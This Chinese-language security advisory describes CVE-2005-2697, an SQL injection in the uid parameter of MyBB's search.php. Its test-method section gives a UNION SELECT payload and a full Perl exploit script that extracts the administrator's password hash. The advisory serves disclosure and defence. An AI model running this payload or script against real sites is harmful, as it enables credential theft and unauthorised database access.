首页 -> 安全研究

安全研究

安全漏洞
MyBB search.php远程SQL注入漏洞

发布日期:2005-08-22
更新日期:2005-08-22

受影响系统:
MyBB MyBB rc4
MyBB MyBB rc3
MyBB MyBB rc2
MyBB MyBB rc1
描述:
BUGTRAQ  ID: 14615
CVE ID: CVE-2005-2697

MyBB是一款用PHP和MySQL开发的论坛程序。

MyBB处理用户请求时存在SQL注入漏洞,远程攻击者可以利用此漏洞非授权操作数据库。

MyBB的search.php脚本没有充分检查过滤uid参数数据,远程攻击者可以在输入中插入特定的SQL语句操作数据库,导致敏感信息泄露、非授权控制服务、数据库破坏。

<*来源:s2b (s2b@hotmail.com
        HACKERS PAL (security@soqor.net
        Devil-00
        ABDUCTER
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112448791006470&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

search.php?action=finduser&uid=-1' UNION SELECT uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,username,password FROM mybb_users where usergroup=4/*


#!/usr/bin/perl -w
use LWP::Simple;
if(!$ARGV[0] or !$ARGV[1] or !$ARGV[2]){
    print "#################[ MyBB SQL-Injection ]############################\n";
    print "#         Coded By Devil-00 [ sTranger-killer ]           #\n";
    print "# Exmp:- mybb.pl www.victem.com mybb 0 0 || To Get Search ID       #\n";
    print "# Exmp:- mybb.pl www.victem.com mybb searchid 1 || To Get MD5 Hash #\n";
    print "# Thnx For [ Xion - HACKERS PAL - ABDUCTER ]              #\n";
    print "##################################################  #################\n";
    exit;
}

my $host = 'http://'.$ARGV[0];
my $searchid = $ARGV[2];

if($ARGV[3] eq 0){
    print "[*] Trying $host\n";

$url = "/".$ARGV[1]."/search.php?action=finduser&uid=-1' UNION SELECT \
uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,ui  d,uid,uid,username,password FROM \
mybb_users where usergroup=4 and uid=1/*";  $page = get($host.$url) || die "[-] \
Unable to retrieve: $!"; print "[+] Connected to: $host\n";
    $page =~ m/<a href="search\.php\?action=results&sid=(.*?)&sortby=&order=">/ && print \
"[+] Search ID To Use : $1\n";  exit;    
}else{

print "[*] Trying $host\n";

$url = "/".$ARGV[1]."/search.php?action=results&sid=$searchid&sortby=&order=";
    $page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";
    $page =~ m/<a href="member\.php\?action=profile&amp\;uid=1">(.*?)<\/a>/ && print \
"[+] User ID is: $1\n"; print "[-] Unable to retrieve User ID\n" if(!$1);
    $page =~ m/<a href="forumdisplay\.php\?fid=1">(.*?)<\/a>/ && print "[+] MD5 hash of \
password is: $1\n"; print "[-] Unable to retrieve hash of password\n" if(!$1);
}

建议:
厂商补丁:

MyBB
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mybboard.com/

浏览次数:4180
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客